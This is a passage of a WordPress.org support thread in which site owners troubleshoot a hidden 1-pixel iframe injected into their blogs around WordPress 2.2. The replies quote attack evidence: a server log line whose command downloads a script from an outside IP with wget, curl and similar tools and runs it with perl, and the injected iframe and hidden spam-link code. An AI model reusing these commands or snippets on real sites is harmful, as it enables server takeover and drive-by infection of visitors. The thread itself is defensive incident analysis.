WordPress.org

Support

Support » How-To and Troubleshooting » iframe injection problem?

iframe injection problem?

  • Hi,

    I’ve searched around for a resolution to my problem but the closet thread I can find is this: http://wordpress.org/support/topic/89912?replies=4

    Basically about a week ago my site began experiencing problems whenever I tried to access the home page >http://www.heroes-hype.com. The screen just freezes for about 10 minutes..sometimes it also throws me out (closes the browser). In the browser footer it displays the following:

    waiting for http://xx.xx.xx.xx./iframe/wp-stats.php

    (the ‘x’ is an IP address which I don’t recognise)

    At first I suspected that it was a problem with the wp-stats plugin which I had just installed prior to this problem surfacing. So I removed the plugin (and other plugins)..I also tried other themes and browsers, but a wee alter and the problem still remains.

    So I contacted my host (as one of the threads here suggested I do) and they have reported to me the following:

    “Your site was most likely injected with a 1px iframe due to a vulnerability in WordPress — which is why 2.2.3 was rushed out and pushed out to everyone. A number of sites have the same link which leads one to believe it was due to an exploit in either WordPress itself or the theme you’re using (which has also been called into question as of late).”

    So now i’m wondering whether anyone can corroborate that this is the likely reason..and whether they is anything I can do to resolve the problem. I would of course like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself..or will it?

    Any advise would be much appreciated.

    PS I am using the CSS Freak theme.

Viewing 15 replies - 16 through 30 (of 89 total)
  • Didn’t mean to imply that I was going to delay an update. 🙂 I did update to 1.3.1 but from other comments it seems to have the same problem.

    I’ve just done a little digging in my logs but haven’t spotted anything yet. I’ll keep looking.

    fermuned

    @fermuned

    I suffer the same iframe injection using WP 2.2.2

    The iframe code was inserted inside the last post (I think that it could be important) and looking at the server logs nobody accessed to the admin part of WP neither to the single page of the post affected.

    The more strange lines of the servers logs are:
    1.-GET //wp-pass.php?_wp_http_referer=http://201.37.71.117:8090/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://201.37.71.117:8090/x.txt;fetch%20http://201.37.71.117:8090/x.txt;lwp-download%20http://201.37.71.1175:8090/x.txt;curl%20-O%20http://201.37.71.117:8090/x.txt;lynx%20http://201.37.71.117:8090/x.txt;perl%20x.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    2.-"OPTIONS / HTTP/1.1" 200 27903 "-" "Microsoft Data Access Internet Publishing Provider Cache Manager"

    aNieto2k

    @anieto2k

    I try use this code for inject something into posts, but it’s I can’t.

    I found a no good functionality in redirect, it’s possible redirect to another web?

    http://youtblog.com?_wp_http_referer=http://www.google.com

    Why??

    I modify the wp_sanitize_redirect() to do more restrictive the redirection.

    function wp_sanitize_redirect($location) {
    	$location = preg_replace('|[^a-z0-9-~+_.?#=&;,/:%]|i', '', $location);
    	$location = wp_kses_no_null($location);
    /* Only redirections into the blog */
    if (stristr($location, "http://") && !eregi(get_option("home"),$location)) return get_option("home");</strong>
    /* Only redirection into the blog */
    	// remove %0d and %0a from location
    	$strip = array('%0d', '%0a');
    	$found = true;
    	while($found) {
    		$found = false;
    		foreach($strip as $val) {
    			while(strpos($location, $val) !== false) {
    				$found = true;
    				$location = str_replace($val, '', $location);
    			}
    		}
    	}
    	return $location;
    }

    Sorry for my English.

    pishmishy

    @pishmishy

    If you’ve been affected by this issue it would be very helpful if you can search through any MySQL logs you have to see if we can pin down where the code was inserted into the database.

    See http://trac.wordpress.org/ticket/5313

    Same problem! Major security issue!

    Mdkart, do you have any logs that may be useful to us?

    I thing my site got one also, if you see some funky stuff

    voiceofbragg, do you have logs from MySQL that may help us here?

    Nope, he’s just spamming the forum… [links from his post were deleted]

    > pishmishy
    No mysql logs, I can’t access to them on my server 🙁

    I just found some code injected in a post from dec. 6th
    http://sintonizando.com/2007/12/06/ulrich-schnauss-elika-y-project-skyward-en-vivo-en-lima/

    some spam links hidden by this:

    <font style=”position: absolute;overflow: hidden;height: 0;width: 0″>

    I’m on WP 2.2
    Any ideas what to fix, or what to update?

    theapparatus

    @theapparatus

    Member

    Any ideas what to fix, or what to update?

    I’d just update the install as you’re a few versions behind. It’s up to 2.3.1 now.

    I just found a post with this code injected with WP 2.2.3. I’m upgrading to 2.3.1 now and have contacted my ISP to see if MySQL logs are available. (Edit: no, logs aren’t available; darned shared hosting.)

    Plugins:
    Edit Comments 0.3 beta
    Filosofo Comments Preview 0.7
    Spam Karma 2 2.2 r3

    Theme:
    extensively hacked version of kubrick

    Damn, I am having same problem. Just realized this in my source code:

    <!– Traffic Statistics –> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –>

    Any solution yet!?

    Not found the source yet, or confirmed that it’s a current problem so there’s no fix.
    What release of WordPress are you running?
    Are you able to determine when that code was inserted? It may have been in your code for a while and so may have been inserted whilst you were running an old copy of WordPress.

Viewing 15 replies - 16 through 30 (of 89 total)
  • The topic ‘iframe injection problem?’ is closed to new replies.
Skip to toolbar